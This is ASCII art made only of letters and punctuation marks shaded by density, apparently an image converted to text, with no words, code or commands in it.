MMMMMMMMMMMMMMMMMMMMMMMMMMMMmdms/sdddddddddddddhhhhhhhyyyyyyyyyyyyyyssssssssssssssoooooooooooooooooooooooooooooooooooooooooooooooo+++oooooooo+++++ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooosssssssssssssssssssssssssssssssyyysssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhyyyhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhys./MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMs--yyyydmmddddhddhhhhhhyyyyyyyyyyysssssssssssssssssssooooooooooooooooooooooooooooooooooooooooooooooooooooooo+++++++++++++++++ooooooooooooooooooooo+ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooosssssssssssssssssssssssssssssssssssssssyysssyyysssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhyyyhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhy+:+sMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMdosshddddddddhhhhhhhhhyyyyyyyyyyysssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooo++++++++++++++++++++++++++++++++ooooooooo+++++++++++++++++++++++++++++oooooooooooooooo++++ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooosssssssssssssssssssssssssssssssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhhhhdddddddddhhhhhhhhhhhhy: +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMy``oshhdddddddhhhhyyyyyyyyyyyysssssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooooo++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++oo+++++++++ooooooooooooooooooooooooooooooooooooossssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhdddddddddddddddddddddddddhhhhhhhy/-MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMs/./yhhddddhhhhhhhyyyyyyyysssssssssssssssssssssoooooooooooooooo+++ooooooooooooooooooooooooo++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++//++++++////////////////++++++++++++++++++++++++++ooooooooooooooooooooooooooooooooooooooosssssssssssssssssssoosssssssssssssssssssssssssssssssssssssssssssyyyyyyyyyyyyyyyhhhhhhhdhhhdddhhhddddddddddddddddmmmmmmmmmmmmmmmmmmddddddddddhys+./sdmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMd- :yhhddddhhhhhhhyyysssssssssssssssssssoooooooooooooooooooooooo+++++oooo++++++++oo+++++++++++++++++++++++++++++++++++++++++++++++++++++/////////////////////////////////////////////////////////+++++++++++++++++++++++++++++oooooooooooooooooooooooooooooooooooooooosssssooooooooosssoooooooooooossssssssssssssssssssssyyyyyyyyhhhhhhhhhhhhdddddddddddddmdddddmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmddddyy++::/hdMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMM` +hyddddddhhhhhhhyyysssssssssssssssssssooooooooooooooooooooooooo++++oooo++++++++++++++++++++++++++++++++++++++++++++++++////////////////////////////////////////////////////////////////////////////////+++++++++++++++++++++++o+++++++++++oooooooooooooooooooooooooooooooooooooooooooooooooooooosssssssssssssssyysssyyyyyyyyhhhhhhhddddddddddddddddddmdmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmdddhyyyo:``-yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMd`.yyhdddddhhhhhhyyyyssssssssssssssssssssooooooooooooooooooooooooo++++++++++++o+++++++++++++++++++++++++++//////////////////////////////////////////://::://::::::::///////::::::::://////////////////////++++++++++++++++++++++++++++++++++oo+ooooooooooooooooooooooooooooooooooooosssossoooooooosssssssssssssyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhhddddddddmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmdddhhhhyys+-.dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMs-oyyhhhhhhhhhhhyyyyyssssssssssssssssssssooooooooooooooooooooooo+++++++++++++++++++++++++++++++++++++++///////////////////////////////:::::::::::::::::::::::::::::::::::::::::::::::://///////////////////////++++++++++++++++++++++++++++++++ooooooooooooooooooooooooooooooooooooossssssssssooosssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhddddddddmmdmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmddddddddhhhhydmhNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMM+/syhhhhhhhyyyyyyyyyyssssssssssssssssssssoooooooooooooooooooooooo++++++++++++++++++++++++++++++++++/////////////////////////////::::::::::::::::::::::::::::::::::::::::::::::::::::://////////////////////////////++++++++++++++++++++++++ooooooooooooooooooooooooooooooooooooosoooooossosssooooosssssssssssssssssssssssssssssssssssssssyyyyyyyyyyyhhhhddddddddddddddmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmddddddddddhhddddhdNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMy/oyyyhyyyyyyyyyyyyyyysssssssssssssssssooooooooooooooooooooooooooo+++++++++++++++++++++++++++////////////////////////////:::::////::::::::::::::::::::::::::::::::::::::::::::::::::://////////://////////////////////////+++++++++++++++oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooosoooooooooooooosssssssssssssyyyyyyyyhhhhhhddddddddddddddddmmmmmmmmmmmmmmmmdddddddddddddddddddddddhhhdddmdhyNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMNmy++syyhyyyyyyyyyyyyyyysssssssssssssssosssossssooooooooooooooooooooo+++++++++++++++++++++++/////////////////////////////:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::://////////////////////////////////////+++++++++++++++ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooossssssssssssyyyyyyyyhhhhhhhdddddddddddddddddddddmmmmmdddddddddddddddddddddddddddddddddhddmmdhdNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMM/.oyyyyyyyyyyyyyyssssssssssssssssssssssoooooosssoooooooooooooooooooooo+++++++++++++++++//////////////////////////////:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::://////////////////////////////////////+++++++++++++++++oooo+oo+++++ooooooooooooooooooooooooooooooooooooooooooo+++++++o+o+ooooooooooooosssssssssyyyyyyyyyyyyyhhhhhhhddddddddddddddddddddmmmmdmddddddddddddddddddddddddddddhhhhdddhddhdNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMN-:syyyyyyyyysssssssssssssssssssssssssssoooooossoooooooooooooooooooooooo+++++++++++++++///////////////:::///:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::://:///////////////////////////////+++++++++++++++++++++++++++++++++++++++o+++++++++++++++++++++++++++++++++++++++o+ooooooooooooooossssssssssssyyyyyyyyyyyyyhhhhhhdddddddmmmmddmmmmddmmmmmmmmmdddddddddddddddddddhhhhddhhhdddddhyyosNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMh -ssyyyyyysssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooo++++++++++++///////////////:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::://////////////////////////////++///++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++oo+ooooooooooooosssssssssssyssyyyyyyyyyyyyyyhhhhdddddddmmmmmmmmmmmmmmmmmmmmmmddddddhhhddddddhhhhhhhdddhdddddhyso:`:oNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMs .osyyyyysssssssssssssssssssssssssssssoooooooooooooooooooooosoooooooooo++++++++++++++////////////:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::///////////////////////////////++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ooooooooooooooossssssssssssssssyyyyyyyyyyyyyyyyyyhhhhhhdddddmmmmmmmmmmmmmmmmmmmmmmmddddddhhdddhhhhhhhhhdddddddddhys+:. :ymMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMM+-:ossyyyssssssssssssssssssssssssssssoossssoosssoooooooooooooooooooooooo++++++++++++++////////////::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::////////////////////////////+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++o++oooooooooooooooosssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyyhhhhhddddddmmmmmmmmmmmmmmmmmmmmmdddddddddddddhhhhhhhddddddddhhyo+/: .yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMNs:oosssyssssssssssssssssssssssssssssssoosssssssooosssoooooooosoooooooooooo++++++++++++///////////////::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::////////////////////////////++++///+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ooooooooooooooooosssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhdddddmmmmmmmmmmmmmmmmmmmmmdddddddddddddddddddddddddddhyyo+/::: .hMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMh.:oossysssssssssssssssssssssssssssssssssooooooooooossoooooooooooooooooooooo++++++++++++++////////////:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::://///////////////////////+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ooooooooooooooosssssssssssssssssyyyyyhhhyyyhhhhhyhhhyyyyyyyhyyhhhhhhhhhhhhddddddmmmmmmmmmmmmmNmmmmmmmmdddddddddddddddddddddddhdddhhhyso+/////:`./dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMs /ossyssssssssssssssssssssssssssssssssssooooooooosssooooooooooooooooooooooooo++ooo+++++++++//////////:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::///////////////////////////+++++++++++++++++++++++++++++++++++++++++++++++++++oooooooooooooooooooooosssssssssssssssssssyyyyyyyhhhhhhhhhhhhhhhhdhhhhhhhhhhhdddddddddddddddmmmmmmNNNNNNNNNNNmmmmmmddddddddddddddddddddddddhhhddhhhhyssoooooo+/:/yhmmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMm+.`ossssssssssssssssssssssssssssossooooooooooooooosossoooooooooooooooooooooooooooooooo+++++++++/////////:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::////////////////////////+++++++++++++++++++++++++++++++++++++++++++++ooooooooooooooooooooooooooosssssssssssssssssssssyyyyyyyyyhhhhhhhhhhhhhhhdddhhhhhhhhhddddddddddddddddddmmmmmNNNNNNNNmmmmmmmmddddddddddddddddddddddhhhhhhhhhhhyyyyyyysssoo+++/-//symmNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMd` -ssssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooosooooooooooooooooooo++++++++++/////////////////////:::::::::::::::::::::::::::::::::///////:::///:::::://///////////////////////++++++++++++++++++++++++++++++++++++++++++++oooooooooooooooooooooooooooosssssssssssssssssssssssssyyyyyyyyyhhhhhhhhhhhhhhhhhyyyyyhhhhhhhhhhhhhhhhdddddmmmmmNNNNNNNmmmmmmmmmmmmdmmdddddddddhhhhhhhhhhhhhhhhyyyyyyyyssssssssssooooo++os+dmmmmmmmNdhydNNNNNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMmo--ossssssssssssssssssssssssssssssssssoooooooosssssoooooooooooooooooooooooooooooooooooooooo+++++++++////////////////////////////////////////////////////////////////////////////////////////+++++++++++++++++++++++++++++++++++++++++++++++++++ooooooooooooooooooooooooooossssssssssssssssssssssssssssyyyyyyyyyyyhhyyyyhhhhhhhhhyyyyhhhhhhhhhhhhhhhdddddmmmmmmNNNNmmmmmmmmmmmmmmmmmmdddddddhhhhhhhhhhhyyyyyyyyyyysssssssssssssssssooo+o+++//+o-/++:-://:----oMMMMMMMMMNNNNNNNNdyyymNMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMd /ssssssssssssssssssssssssssssssssssooooooooossssoooosoooooooooooooooooosoooooooooooooooooo++++++++++++//////////////////////////////////////////////////////////////////////////////////+++++++++++++++++++++++++++++++++++++++++++++++++++++oo++oooooooooooooooooooooooossssssssssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhdddddddddddmmmmmmmmmmmmmmmmmmmmmmmmmmmddddddhhhhhhyyyyyyyyyyyyyyyyssssssssssssssssssosooosoooooooooo+ooo++///:/+yss++h++/:-------` `-oyymNMMMMMMMMMMMMMMMMM
MMMMMMMMMd `/ssssssssssssssssssssssssssssssssssoooosssoooooooooooooooooooooooooooossooooooooooooooooooooooooo+++++++++++++++++/////////////////////////////////////////////////////////////++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++oo++++oooooooooooooooooooooooooooosssssssssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyhyyhhhhhhhhhhhhhdddddddddddmmmmmmmmmmmmmmmmmmmmdddddddhhhhhhyyyyyyyyyyyyyyyyyyyyssssssssssssssssssoooooooooooooooooooooooooo+++o++++///::--:///+++//:/-/--++mMMMMNNNMMMMMMM
MMMMMMMMMm/oyssssssssssssssssssssssssssssssssssoosssooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo+++++++++++++++++/////////////////////////////////////////////////////++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ooo++oooooooooooooooooooooooooooooooooooooossssssssssssssssssssssssssssyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhddddddddddddmmmmmmmmmmdddddhhhhhhhyyyyyyyyyyyyyyyyyyyyyssssssssssssssssooooooooooooooooooooooooooooooo+++++++++++++++++oooooossyyhhysoydNMMo::NMMMMMM
MMMMMMMMMm/sdyyssssssssssssssssssssssssssssssssooooooooooooooooossooooooooooooooooooooooooooooooosssoooooooooooooooooooo++ooo+++++++++/////////////////////////////////////////////////+++++++++++//++++++++++++++++++++++++++++++++++++++++++++++++++++++oo++ooooooooooooooooooooooooooooooooooooossssssssssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhdhddddddddddddddddhhhhhhhhhyyyyyyyyyyyyyyyyyyyysssssssssssssssoooooooooooooooooooooooooooooooooo+++ooo+++++++++++ooooooooosydNMMMMMMMmd-yMMMMMM
MMMMMMMMMd /hsssssssssssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooooosssoooooooooooooooooooooooooooooo+++++++//////////////////////////////////////////////++/////////////+++++++++++/+++++//+++++++++++++++++++++++++++o++++++++oooooooooooooooooooooooooooooooooooossssssssssssssssssssssssssssssyyysssyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhddddddhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyssssssssssssosoooooooooooooooooooooooooooooooooooooooooooo+ooo++oooooooooossymMMMMMMmh/oMMMMMM
MMMMMMMMMd.+ysssssssssssssssssssssssssssssssssssssssssoooooooooosssssoooooooooooooooooooooooooooooosoooooooooooooooossssssssssssssssssoo++++++++///////////////////////////////////////////////////////////////////////////++++++++++++++++++++++++++++++++++o+++oooooooooooooooooooooooooooooooooooossssssssssssssssssssssssssssssssssysssssssssssyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyysssssssssssssssoooooooooooooooooooooooooooooooo+ooo+oo+++ooo+ooooooooooooooosssymNMMMMso+NMMMMMM
MMMMMMMMMm..yysssssssssssssssssssssssssssssssssssssssooooooooooooossoooooooooooooooooooosssoooooooooooooooooooooooooooossssssssyyyyyyyssooooo+++++++++/////////////////////////////+++++//////////////////////////////////////++++++++++++++++++++++++++++++++++++oooooooooooooooooooooooooooooooooooossssssooosssoossssssssssssssssssssssssssssssssssssssyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyssssssssssssssssssoooooooooooooooooooooooooooooooo+oooooooo+++ooooooooooooooosssssshNMMMMMMMMMMMMM
MMMMMMMMMMy/oyssssssssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooo+++++ooooosssyyyyyyyssssssssssssssyyyysysssooooooo++++++++////////////////////////++++//////////////////////////////////////////////++++++++++++++++++++++++++++++++++++o++oooooooooooooooooooooooooooooooooooooooooooooosssoosooosossssssssssssssssssssssssssssssyyyyyyyhyyhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyssssssssssssoooooooooooooooo+++++++++++++oo++++oooooooooooooooooooooooooooooossssysyMMMMMMMMMMMMMMM
MMMMMMMMMMs-sdysssssssssssssssssssssssssssssssssssssssooooooooooooooooooooooooooooooooooo+++++ooossyyyhhdddhhhhhyyyyyyssssssssssssssoooooooooooo++++++++++////////////////////////+////////////////////////////////////////////////////////+/++++++++++++++++++++++++++++ooooooooooooooooooooooooooooooooooooooooooooooooooooooooossoooooossssooooooossssssssssssssssyyyyyyyhhhhhyhhhhhyyyyyyyyyyyyyyyyyyyyyyyyysssssoooooooo++++++++++++++++++++++++++++++++++oooosssyyyyyysssooooooooooooosyyyhhhyNMMMMMNNmdMMMMMM
MMMMMMMMMMmsymysssssssssssssssssssssssssssssssssssooooooooooooooooooooooooooooooooo+++o+ooossyyyyhhhhhyyyyysysssyyyyysssssssssoosooooooooooo++ooo+++++++++//////////////////////////++////////////////////////////////////////////////////////////////+++++++++++++++++++++++ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooossssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhyyyyysssoooo+++++++//////////////+++++++++oooooosssyyyhhhdddddhhhhyyyssoooooosssyhhhmNNmdNMMMMmd:sMMMMMM
MMMMMMMMMM/:yhyssssssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooooosyhhhhhdhhyssoooo+++ooosssssssssssssooooooooooo++++++++ooo++++++++/////////////////++++//+///++++///////////////////////////////////////////////////////////////////++++++++++++++++++++ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooossssssssssyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhyysssoo++++///////////////+++++ooooossyyyhhhhhddddmmmmmmmmdddhhyysssoooossyyyyso----+ymMMMNmyomMMMMMM
MMMMMMMMMM:`:syssssssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooosyyhhddhyyso++++++++++ooossssssssssssooooooooo++++++++++++++++++++++/////////////////++++///////+++////////////////////////////////////////////////////////////////////////++++++++++++++++++++++++++++++++++++++o++oooooooooooooooooooooooooooooooooooooo+ooooooooooooooooooooossssssssssssssyyyyyyyyyyyyyyhhhhhhhhhdddhhhhyyyssoo++////////+++++++oooossssyyhhhhdddddmddddddddddhhyysssooo+oooosssso-`sssmNNMMMMMMMMMMMMMMMMM
MMMMMMMMMMm/:.+ysssssssssssssssssssssssssssssssssssooosssoooooooooooooooooo++oooooossyyhhhhhyso++//++++++++oooossssssssssssssssssooo+++++++++++++++++++++/////////////////++////////////////////////////////////////////////////////////////////////////////////+++++++++++++++++++++++++++++++++++++++++++ooooooooooooooo++oooooooooooooooooooooooooooooooooooooooooooosssssssssssyyyyyyyyyyyyhhhhhhhddddddddddddhhhyyssoo+++++++oooossssssyyyyyhhhhhhhhhhhhhhhyyyyssooo++++oosssssssyoo:-sNMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMNs:`syssssssssssssssssssssssssssssssssssssssssssoooooooooooooooo+++ooooosyhhhhhhyso+++//++++++oooosssssssssssssyyyhhhhyysooo++++++++oo++++++++//////////////////++///++////+////////////////////////////////////////////////////::://///////////////+++++++++++++++++++++++++++++++++++++++++++++++++++++++o+++++++oooo+++++++o+++++++++oooooooooooooooooossssssssssssssssyyyyyyyyyhhhhhhddddddddddddddddhhhhyyyysssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyssysssssyyyhhhyyysy+:/yNMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMM+:`.syssssssssssssssssssssssssssssssssssssssssssssssoooooooooooooo++ooosyhhddhyys+++++++++ooooossssssyyyyyhhhdddddddhhyso+++/+++++ooo+++++++++++//////////////+++//////////////////////////////////////////////////////////////:////::://///////////////+++++++/////////////++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++o++oooooooooooooooooooosssssssssssyyyyyyyhhhhhhhhhddddddddddddddhhhyyyyyyyyyyyyyyyyyyysssyyyyssssssssysyyyyyyhhhhhhhdhhhhyysoo/ydmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMy. .ssssssssssssssssssssssssssssssssssssssssssssssssssoooooooooo+++oosyhhddhhyso+++++++++oooossssyyyhhhhddddmmddddhyyso+///++++oossoooo+++++++++////////////////////////////////////////////////////////////////////////////////:::////////////////////////////////////////////+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ooooooooooooooossssssssssyyyyyyhhhhhhhhhddddddddddhhhhhyyyyssssssssssssssssssssssssssssssssyyyyhhhhhhdddddddhyss++++//dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMh` .ssssssssssssssssssssssssssssssssssssssssssssssssssssooooooo+++oosyhhhhhysso++++++++oossssyyyhhhhhddddddddddhhysoo++//+++oosyyyssoo++++++++++++////////////////////////////////////////////////////++++++++/+/////////////////////////////////////////////////////////////////////+++++++++++++++++++++++++++++++++++++++++++++++++o++++++++oooooooooooooooosssssssssyyyyyhhhhhhddhhhhddddhhhhhhyyyysssssssssssssssssssssssssssssssssyyhhhhhddddddddmdddhhyyyssso+-oNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMN+ `sssyyyyyyyssssssssssssssssssssssssssssssssssssssssssssoooo++++osyyhhhyysooo+++++++oossyyyhhhhdddddddddddhyysoo+++++++oossyyyysso+///////+++++++//////////////////////////////////////////////////++///+++++//////////////////////////////////////////////::///::///////////////////++++++++++++++++++++++++++++++++++++++++++++++oo+++++ooooooooooooooooossssssssyyyyyhhhhhhhdddhhhhhhddhhhhyyyyyssssssssssssssssssssssssssyyyyyyyyhhhddddmmmmmmmmmmmmmmmmmdddhhs://:oMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMo+syssssssssssssssssssssyysssyyyysssyssssssssssssssssssssooo++++ossyhhhyysoo+++++++oosyyyyhhhhddddddddddhhysoo++++++ooosssyyyssoo++//++///+++++++++///////////////////////////////////////++++///++++++++++++//////++/////////////////////////////:::::::::::::::://////////////////////+++++++++++++++++++++++++++++++++++++o+ooooooooooooooooooooooooooossssssssyyyyyhhhhhddddddhhhhhhhhhhhyyyyyysssssssssssssssssyyyyyyyyyyyyyhhhhhdddddmmmmmmmmmmmmmmmmmmmmmmmdddmhdMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMNsssssssssssssssssssssysssyyyysssyyyssssssssssssssssssoooo+++ooosyyyyysoo++++++++oossyyyhhhddddddddhhyyoo++////+ooosssooo++++++++oooo+++++++++++++////////////////////////////////////++++///+++++++++++++/////++///////////////////////////////:::::::::///:::////////////////////////+/++++++++++++++++++++++++++++++oooooooooooooooooooooooooooooooosssssssyyyyyhhhhddddddddhhhhhhhyyyyyyyyysssssssssssssssyyyyyyyyyyyyyhhhhhhhhhhhdddddddddddddddddddddddddddddo-hNMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMmhsssssssssssssssssssssssyyyyyyyyyyyssssssssssssssssssooooo+++ooossyssooo+++++++oosssyyhhhdddmmdddhhyyso++++++oooooo++//://///+++ooooooooo++++++++//////////////////////////////////////////////////////////////////////////////////////////////::::/::/:::::://///////////////////////////+++++++++++++++++++++++++ooooooooooooooooooooooooooooooooossssssyyyyyhhhhddddddddhhhhhhhyyyyyyssssssssssssssssyyyyyyyyyyyyyyyyyyysssssyyyyyyyhhhhhhhhhhhdddddddddddddhhyo/oMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMmssssssssssssssssssssssyyyysyyysyysssssssssssssssssssooooooo+ooosssssoooo++++oooosssyyhhhdddddddhhhyyssssssssssoo++//:////////+++ooooooooo++++++++////////////////////////////////////////////////////////////////////////////////////////////::::::::::://::////////////////////////////////+++++++++++++++++++ooooooooooooooooooooooooooooooooossssssssyyyhhhhhddddddhhhhhhyyyyyyssssssssssssssssssssssssssssssssssoosssssssssyyhhhhhhhhhdddhhddddddddddddddhhhysymMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMNo+oosssssssssssssssssyyyyyysssssssssssssssssssssssssoooooooooooooooosooooooooooooossyyyyhhhhhhhhhyyyyyyyyssssoo++////+++++oooooossssoooo++++++++++////////////////////////////////////////////////////////////////////////////////////////::::::::://:////////////////////////////////////++++++++++++++++oooooooooooooooooooooooooooooooooooooosssssssyyyyhhhhddhhhhhhhyyyyyyyyssssssssssssooooooooooooosssssssssyyyyyyyyyyyyhhhhhhhhhhhdddddddddddddddddddhhhhhhhMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMNs..+osyysssssssssssssyyyyyyssssssssssssssssssssssssssssoooooooooooossssoooooooooooosssssyyyyyyyyyyysssssoo++++/++++ooossssssssssssoooooo++++++++++/////////////////////////////////////////////////////////////////////////////////////::::::::::://////////////////////////////////++++++++++++ooooooooooooooooooooooooooooooooooooooooooooooosssssssyyyyhhhhhhhyhhhyyyyyyyyyysssssssoooooo++ooooooosssyyyyyyyhhhhyyyyyyyyyhhhhhhhhhhhhhddhhddddddddddddddddddhmNMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMsh--+sssssssssssssysyyyyssssssssssssssssssssssssssssssssooooooooooooooooooooooooooooooosssssssoooooo+++++++////+++oooossssssssossoosoooooooo+++++////////////////////////////////////////////////////////////////////////////:////::::::::::::::////://///////////////////++++++++++++++oooooooooooooosooooooooooooo+++++++++++ooooooooooooossssssyyyyyyhhhhyyyyyyyyyyyyyyyyysooooo++++++oooooossyyyyyyyhhhhhhhhhyhhhyyyysssyyyyyyyyyyyyyyyyyhhhhddddddddddmdmNMMMMMMMMMMMMMMMMMMMMMMMMMM
